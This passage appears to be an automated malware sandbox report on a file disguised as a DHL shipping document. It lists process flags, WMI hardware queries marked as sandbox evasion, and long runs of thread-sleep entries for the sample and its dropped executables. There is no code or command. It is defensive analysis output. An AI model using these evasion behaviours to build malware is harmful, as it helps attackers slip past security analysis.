                  Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  barindex
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exe TID: 5268Thread sleep time: -2767011611056431s >= -30000s
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exe TID: 5268Thread sleep count: 48 > 30
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exe TID: 5248Thread sleep count: 9575 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4672Thread sleep time: -10145709240540247s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4604Thread sleep count: 9332 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1244Thread sleep time: -2767011611056431s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exe TID: 1844Thread sleep count: 9713 > 30
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exe TID: 5884Thread sleep time: -23980767295822402s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exe TID: 5884Thread sleep time: -100000s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exe TID: 5884Thread sleep time: -99839s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exe TID: 5884Thread sleep time: -99733s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exe TID: 5884Thread sleep time: -99621s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exe TID: 5884Thread sleep time: -99486s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exe TID: 5884Thread sleep time: -99344s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exe TID: 5884Thread sleep time: -99230s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exe TID: 5884Thread sleep time: -99119s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exe TID: 5884Thread sleep time: -99014s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exe TID: 5884Thread sleep time: -98894s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exe TID: 5884Thread sleep time: -98750s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exe TID: 5884Thread sleep time: -98631s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exe TID: 5884Thread sleep time: -98511s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exe TID: 5884Thread sleep time: -98402s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exe TID: 5884Thread sleep time: -98292s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exe TID: 5884Thread sleep time: -98171s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exe TID: 5884Thread sleep time: -98059s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exe TID: 5884Thread sleep time: -97950s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exe TID: 5884Thread sleep time: -97835s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exe TID: 5884Thread sleep time: -97714s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exe TID: 5884Thread sleep time: -97591s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exe TID: 5884Thread sleep time: -97482s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exe TID: 5884Thread sleep time: -97359s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exe TID: 5884Thread sleep time: -97244s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exe TID: 5884Thread sleep time: -97140s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exe TID: 5884Thread sleep time: -97031s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exe TID: 5884Thread sleep time: -99825s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exe TID: 5884Thread sleep time: -99711s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exe TID: 5884Thread sleep time: -99559s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exe TID: 5884Thread sleep time: -99424s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exe TID: 5884Thread sleep time: -99297s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exe TID: 5884Thread sleep time: -99186s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exe TID: 5884Thread sleep time: -99078s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exe TID: 5884Thread sleep time: -98968s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exe TID: 5884Thread sleep time: -98851s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exe TID: 5884Thread sleep time: -98720s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exe TID: 5884Thread sleep time: -98527s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exe TID: 5884Thread sleep time: -98414s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exe TID: 5884Thread sleep time: -98311s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exe TID: 5884Thread sleep time: -98200s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exe TID: 5884Thread sleep time: -98089s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exe TID: 5884Thread sleep time: -97964s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exe TID: 5884Thread sleep time: -97851s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exe TID: 5884Thread sleep time: -97734s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exe TID: 5884Thread sleep time: -97593s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exe TID: 5884Thread sleep time: -97462s >= -30000s
                  Source: C:\Users\user\AppData\Local\explorers.exe TID: 5840Thread sleep time: -3689348814741908s >= -30000s
                  Source: C:\Users\user\AppData\Local\explorers.exe TID: 5840Thread sleep count: 37 > 30
                  Source: C:\Users\user\AppData\Local\explorers.exe TID: 5912Thread sleep count: 9667 > 30
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe TID: 5492Thread sleep count: 4987 > 30
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe TID: 760Thread sleep time: -11068046444225724s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe TID: 760Thread sleep time: -100000s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe TID: 760Thread sleep time: -99868s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe TID: 760Thread sleep time: -99734s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe TID: 760Thread sleep time: -99621s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe TID: 760Thread sleep time: -99514s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe TID: 760Thread sleep time: -99398s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe TID: 760Thread sleep time: -99282s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe TID: 760Thread sleep time: -99167s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe TID: 760Thread sleep time: -99036s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe TID: 760Thread sleep time: -98922s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe TID: 760Thread sleep time: -98792s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe TID: 760Thread sleep time: -98687s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe TID: 760Thread sleep time: -98538s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe TID: 760Thread sleep time: -98420s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe TID: 760Thread sleep time: -98310s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe TID: 760Thread sleep time: -98203s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe TID: 760Thread sleep time: -98094s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe TID: 760Thread sleep time: -97976s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe TID: 760Thread sleep time: -97853s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe TID: 760Thread sleep time: -97732s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe TID: 760Thread sleep time: -97625s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe TID: 760Thread sleep time: -97508s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe TID: 760Thread sleep time: -97390s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe TID: 760Thread sleep time: -97264s >= -30000s
                  Source: C:\Users\user\AppData\Local\explorers.exe TID: 5104Thread sleep time: -2767011611056431s >= -30000s
                  Source: C:\Users\user\AppData\Local\explorers.exe TID: 2220Thread sleep count: 6320 > 30
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe TID: 1176Thread sleep count: 499 > 30
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\explorers.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\explorers.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeWindow / User API: threadDelayed 9575
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9389
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9332
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeWindow / User API: threadDelayed 9713
                  Source: C:\Users\user\AppData\Local\explorers.exeWindow / User API: threadDelayed 9667
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeWindow / User API: threadDelayed 4987
                  Source: C:\Users\user\AppData\Local\explorers.exeWindow / User API: threadDelayed 6320
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeWindow / User API: threadDelayed 499
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeThread delayed: delay time: 100000
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeThread delayed: delay time: 99839
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeThread delayed: delay time: 99733
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeThread delayed: delay time: 99621
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeThread delayed: delay time: 99486
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeThread delayed: delay time: 99344
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeThread delayed: delay time: 99230
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeThread delayed: delay time: 99119
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeThread delayed: delay time: 99014
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeThread delayed: delay time: 98894
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeThread delayed: delay time: 98750
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeThread delayed: delay time: 98631
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeThread delayed: delay time: 98511
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeThread delayed: delay time: 98402
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeThread delayed: delay time: 98292
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeThread delayed: delay time: 98171
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeThread delayed: delay time: 98059
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeThread delayed: delay time: 97950
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeThread delayed: delay time: 97835
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeThread delayed: delay time: 97714
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeThread delayed: delay time: 97591
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeThread delayed: delay time: 97482
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeThread delayed: delay time: 97359
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeThread delayed: delay time: 97244
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeThread delayed: delay time: 97140
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeThread delayed: delay time: 97031
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeThread delayed: delay time: 99825
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeThread delayed: delay time: 99711
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeThread delayed: delay time: 99559
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeThread delayed: delay time: 99424
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeThread delayed: delay time: 99297
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeThread delayed: delay time: 99186
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeThread delayed: delay time: 99078
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeThread delayed: delay time: 98968
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeThread delayed: delay time: 98851
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeThread delayed: delay time: 98720
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeThread delayed: delay time: 98527
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeThread delayed: delay time: 98414
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeThread delayed: delay time: 98311
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeThread delayed: delay time: 98200
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeThread delayed: delay time: 98089
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeThread delayed: delay time: 97964
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeThread delayed: delay time: 97851
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeThread delayed: delay time: 97734
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeThread delayed: delay time: 97593
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeThread delayed: delay time: 97462
                  Source: C:\Users\user\AppData\Local\explorers.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeThread delayed: delay time: 100000
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeThread delayed: delay time: 99868
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeThread delayed: delay time: 99734
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeThread delayed: delay time: 99621
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeThread delayed: delay time: 99514
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeThread delayed: delay time: 99398
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeThread delayed: delay time: 99282
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeThread delayed: delay time: 99167
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeThread delayed: delay time: 99036
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeThread delayed: delay time: 98922
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeThread delayed: delay time: 98792
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeThread delayed: delay time: 98687
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeThread delayed: delay time: 98538
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeThread delayed: delay time: 98420
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeThread delayed: delay time: 98310
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeThread delayed: delay time: 98203
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeThread delayed: delay time: 98094
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeThread delayed: delay time: 97976
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeThread delayed: delay time: 97853
